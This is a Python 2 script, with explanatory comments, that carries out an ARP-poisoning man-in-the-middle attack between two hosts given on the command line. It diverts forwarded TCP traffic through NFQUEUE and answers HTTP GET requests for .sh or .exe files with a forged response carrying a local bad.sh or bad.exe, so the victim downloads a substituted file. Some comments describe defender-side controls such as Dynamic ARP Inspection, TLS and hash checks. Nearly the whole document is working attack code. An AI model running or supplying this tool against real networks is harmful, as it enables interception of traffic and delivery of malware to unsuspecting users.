- #!/usr/bin/python2
- from netfilterqueue import NetfilterQueue
- from scapy.all import *
- import os
- import socket
- import sys
- from termcolor import colored
- import threading
- import netifaces
#host2 = "172.30.0.1"
#host1 = "172.30.122.38"
# The two hosts whose traffic will be relayed through this machine. Both are
# taken verbatim from the command line (argv[1], argv[2]) with no validation.
host2 = sys.argv[2]
host1 = sys.argv[1]
# Hard-coded; not referenced anywhere in this file.
router_ip = "10.0.0.1"
#my_mac = "52:54:00:80:3b:32"
# Fixed hardware address that unmitm() re-advertises for host1 at shutdown.
# It is never discovered from the network, so it is only correct for the
# author's own lab setup — TODO confirm before reuse elsewhere.
target_mac = "52:54:00:80:3b:32"
# MAC of the *second* interface reported by netifaces (index 1 is an assumption
# about interface ordering, presumably skipping "lo"); this is the address the
# forged ARP replies in mitm() direct both hosts to.
my_mac = netifaces.ifaddresses(netifaces.interfaces()[1])[netifaces.AF_LINK][0]['addr']
# Module-level flags written by callback(). start() runs callback() on a new
# thread per queued packet, so these are shared across threads with no lock.
# should_drop is never read or written below.
should_replace = False
should_drop = False
is_exe = False
# Divert every forwarded TCP segment into NFQUEUE 1, where callback() issues
# the accept/drop verdict. Runs at import time and needs CAP_NET_ADMIN; on a
# host being audited this rule is visible in the FORWARD chain.
os.system('iptables -A FORWARD -p tcp -j NFQUEUE --queue-num 1')
def callback(packet, temp):
    """NFQUEUE verdict handler, run on its own thread for each forwarded TCP segment.

    Parses the queued packet with scapy and inspects its Raw payload. When the
    payload contains "GET" together with ".sh" or ".exe", a complete HTTP 200
    response is forged from the local file bad.sh / bad.exe, sent to the
    requesting client with the server's IP/port as source and TCP sequence
    numbers derived from the request, and the genuine request is dropped so
    the origin server never receives it. Every other packet is accepted
    unchanged.

    Args:
        packet: NetfilterQueue packet (get_payload / accept / drop).
        temp: unused; start() passes the literal "hello".

    Defender's view: the substituted body comes from this host with a spoofed
    source address and a fixed "Server: Apache" header, and the client never
    sees the origin's reply. Transport encryption and checking downloads
    against a published hash or signature are the controls that make this
    substitution detectable or ineffective.
    """
    global should_replace
    global is_exe
    payload = packet.get_payload()
    pkt = IP(payload)
    # Raw payload with CRLF normalised to LF; just "\n" when there is no Raw layer.
    data = print_get(pkt)
    # Skip empty / tiny payloads (pure ACKs etc.) before dumping the segment.
    if len(str(data)) > 5:
        print("*"*80)
        print(str(packet) + "\n")
        # .load resolves through the payload layers; in practice only reached
        # when a Raw layer is present (the length test above).
        print(str(pkt['TCP'].load))
    # Substring matching on the whole payload, not on the request line — any
    # occurrence of ".sh"/".exe" (e.g. in a query string or header) qualifies.
    if "GET" in data and ".sh" in data:
        should_replace = True
        is_exe = False
        print(colored("Found GET request for .sh file", "green"))
    if "GET" in data and ".exe" in data:
        should_replace = True
        is_exe = True
        print(colored("Found GET request for .exe file", "green"))
    if should_replace:
        # Reset immediately; the flag is module-global and shared between the
        # per-packet threads started by start().
        should_replace = False
        print(colored("Replacing this packet", "red"))
        print("Destination: " + str(pkt['IP'].dst) + ", Source: " + str(pkt['IP'].src))
        print("Source Port: " + str(pkt['TCP'].sport) + ", Dest Port: " + str(pkt['TCP'].dport))
        print("Sequence is: " + str(pkt['TCP'].seq) + ", ACK is: " + str(pkt['TCP'].ack))
        bad = "THIS IS EVIL"
        # Response body is read whole from a file in the current working
        # directory, chosen by the flag set above. The open() itself raises if
        # the file is missing, which kills this thread without a verdict.
        if is_exe:
            with open('bad.exe') as f:
                bad = f.read()
        else:
            with open('bad.sh') as f:
                bad = f.read()
        # Minimal HTTP/1.1 response; Content-Length is the byte count of the
        # file just read. Headers are the same for both file types.
        bad = ("HTTP/1.1 200 OK\r\n" +
               "Server: Apache\r\n" +
               "Content-Length: " + str(len(bad)) + "\r\n" +
               "Connection: close\r\n" +
               "Content-type: text/html\r\n" +
               "\r\n" + bad)
        # Size of the client's request segment: the forged reply acknowledges
        # exactly that much, and its seq picks up where the client expects the
        # server to continue (the request's ack field).
        length = len(pkt['TCP'].payload)
        s = IP(src=pkt['IP'].dst, dst=pkt['IP'].src) / TCP(sport=pkt['TCP'].dport, dport=pkt['TCP'].sport, flags='PA', seq=pkt['TCP'].ack, ack=pkt['TCP'].seq + length) / str(bad)
        print("")
        print(s['TCP'].load)
        print(colored("Successfully built packet", "green"))
        # Layer-3 send from this host; addresses in the IP/TCP headers are the
        # server's, not ours.
        send(s)
        print(colored("Sent forged packet", "green"))
        # The original request is not forwarded, so the real server sends no
        # competing response.
        packet.drop()
        return
    packet.accept()
def print_get(packet):
    """Return the packet's Raw payload as text with CRLF sequences turned into LF.

    Uses scapy's ``sprintf``: the ``{Raw:...}`` conditional expands to nothing
    when the packet carries no Raw layer, so the result is then just the
    trailing newline from the format string.
    """
    raw_text = packet.sprintf("{Raw:%Raw.load%}\n")
    return "\n".join(raw_text.split("\r\n"))
def mitm():
    """Poison both hosts' ARP caches so each sends the other's traffic to this machine.

    Each send() is an unsolicited ARP "is-at" reply: the first claims host1's
    IP (psrc) towards host2, the second claims host2's IP towards host1, both
    pointing at my_mac. Called once from main(). On a switched network this
    is the traffic that Dynamic ARP Inspection, static ARP entries or an ARP
    change monitor are designed to flag.
    """
    send(ARP(op=ARP.is_at, psrc=host1, pdst=host2, hwdst=my_mac))
    send(ARP(op=ARP.is_at, psrc=host2, pdst=host1, hwdst=my_mac))
def unmitm():
    """Re-advertise host1 at the fixed target_mac towards host2.

    Only this direction is restored; host1's entry for host2, which mitm()
    also poisoned, is not corrected here and is left to age out.
    """
    send(ARP(op=ARP.is_at, psrc=host1, pdst=host2, hwdst=target_mac))
def start(packet):
    """NetfilterQueue bind() target: hand each queued packet to callback() on a daemon thread.

    The second argument to callback() is a placeholder string that callback()
    never reads. Nothing joins the thread, so the accept/drop verdict is
    issued asynchronously from the queue's run loop.
    """
    worker = threading.Thread(target=callback, args=(packet, "hello"))
    worker.daemon = True
    worker.start()
def main():
    """Entry point: poison ARP, then run the NFQUEUE verdict loop until Ctrl-C.

    On KeyboardInterrupt it re-arps host2 (see unmitm), unbinds queue 1 and
    then runs `iptables -F` / `iptables -X`, which flush and delete *every*
    chain on the host — not just the FORWARD rule added at import time — so
    any pre-existing firewall policy is discarded. The iptables cleanup is
    only reached via the except branch; other exceptions leave the rule and
    the poisoned ARP entries in place.
    """
    print ("="*80)
    print("Setting up MITM...")
    mitm()
    print("="*80)
    q = NetfilterQueue()
    # start() is invoked for each packet diverted by the FORWARD rule.
    q.bind(1, start)
    try:
        q.run() # Main loop
    except KeyboardInterrupt:
        print("")
        print("Re-arping targets")
        unmitm()
        print("Unbinding queue")
        print("Clearing iptable settings")
        q.unbind()
        os.system('iptables -F')
        os.system('iptables -X')
- main()